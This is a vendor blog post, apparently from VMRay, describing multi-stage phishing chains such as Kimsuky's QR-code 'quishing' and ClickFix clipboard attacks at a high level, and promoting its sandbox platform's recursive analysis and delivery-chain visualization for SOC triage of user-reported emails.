Around the same time, the FBI issued a FLASH alert warning about North Korean state-sponsored group Kimsuky using QR-code-based spear phishing — or “quishing” — against think tanks, academic institutions, and government bodies in the U.S. and NATO-allied countries. The attack pattern was layered: phishing emails impersonating embassy staff or foreign policy advisors contained QR codes in attachments or inline graphics. When victims scanned these codes on their phones, they were routed through attacker-controlled redirectors that fingerprinted the device before serving a mobile-optimized fake login page mimicking Microsoft 365 or Okta.
These two examples share a common trait: the initial email is not where the damage happens. The payload sits several layers down, behind documents, QR codes, redirects, clipboard tricks, and legitimate service abuse. At each stage, the attack is designed to look just benign enough to slip past automated defenses.
Why Traditional Tools Struggle
Secure Email Gateways (SEGs) were built for a simpler world. They scan the email, check the attachment, evaluate the URL — and make a decision. But when the email is clean, the attachment is password-protected, the QR code resolves to a redirect chain, and the actual payload only materializes after a ClickFix interaction on a webpage three steps removed from the original message — there’s nothing for the gateway to flag.
This is why so many of these attacks are caught not by automated defenses, but by users themselves. User-reported phishing has become one of the most valuable signal sources for SOC teams. But it creates a different problem: volume and speed. When a user reports a suspicious email, the analyst needs to determine whether it’s a real threat — fast. And for a multi-stage delivery chain, that means manually opening attachments, extracting URLs, following redirects, clicking through CAPTCHAs, and piecing together a kill chain that spans multiple files and web pages.
It’s a full investigation. And when your SOC is processing hundreds of user reports a day, doing it manually for every one is simply not sustainable.
What Effective Triage Actually Requires
To handle these attacks at scale, you need a tool that behaves the way a skilled analyst would — but automatically:
It needs to go beyond the initial sample. When a user-reported email contains a PDF with a QR code, the tool should decode that QR code, follow the URL, interact with the landing page, and keep going until it reaches the final payload. When a password-protected Word file is attached, it should find the password in the email body and use it to open the document. When a webpage places a script on the clipboard, it should capture that content and analyze it separately.
It needs to do this recursively, without human intervention. Each artifact extracted during analysis — a URL from a document, a file downloaded during page interaction, clipboard content from a pastejacking site — should be automatically resubmitted for its own analysis. This is what “following the chain” means in practice: not stopping at the first layer, but methodically working through every stage until the full attack path is exposed.
And critically, it needs to present the result in a way that lets the analyst understand what happened at a glance — without clicking through dozens of individual analysis reports.
How VMRay Tackles This: Visualize Delivery Chains
VMRay’s recursive analysis engine has been doing this work automatically for years — extracting and resubmitting actionable content from every stage of an attack: URLs from documents, decoded QR codes (including obfuscated and stylized variants), password-cracked attachments, clipboard content from ClickFix pages, and files downloaded during dynamic analysis. Each artifact gets its own sandbox analysis, and the results cascade down the chain.
What’s new in the VMRay Platform 2026.1.0 release is how all of this is surfaced to the analyst.
The redesigned Relations Tab now renders the entire delivery chain as a single, interactive graph. From the initial email or file submission all the way to the final payload — every artifact, every relationship, every verdict — mapped in one view. Nodes are color-coded by verdict, so the analyst can immediately see where in the chain things turned malicious: which attachment was clean noise, which URL was a decoy, and which download three layers deep was the actual threat.
For an L1 analyst triaging user-reported phishing, this is the difference between spending thirty minutes piecing together an investigation and spending thirty seconds confirming a verdict and escalating.
Uncovering Campaigns You Didn’t Know Existed
This release also introduces cross-sample campaign correlation. When separate submissions — different emails, reported by different users, days apart — share any malicious artifact anywhere in the delivery chain, VMRay automatically links them on the same graph.
This isn’t matching on sender addresses or file hashes. It’s correlation on artifacts that only exist inside VMRay’s recursive analysis: decoded QR payloads, clipboard scripts, intermediate downloads that never appear in logs or EDR telemetry. Coordinated campaigns surface on their own, changing the question from “is this email malicious?” to “is this email part of something bigger?”
The Bottom Line
Multi-stage delivery chains are the new playbook. Responding to them requires a tool that follows the attack automatically, recursively, and completely — and then makes the result understandable at a glance. That’s what the VMRay Platform was built to do, and with Visualize Delivery Chains, what the engine uncovers is now as clear as the threats themselves.
Sources:
https://www.microsoft.com/en-us/security/blog/2026/03/19/when-tax-season-becomes-cyberattack-season-phishing-and-malware-campaigns-using-tax-related-lures/#:~:text=QR%20code%20and%20W2%20lure,primarily%20in%20the%20United%20States.
https://www.cybersecurityintelligence.com/blog/n-korean-quishing-attacks-targeting-nato-members-9035.html
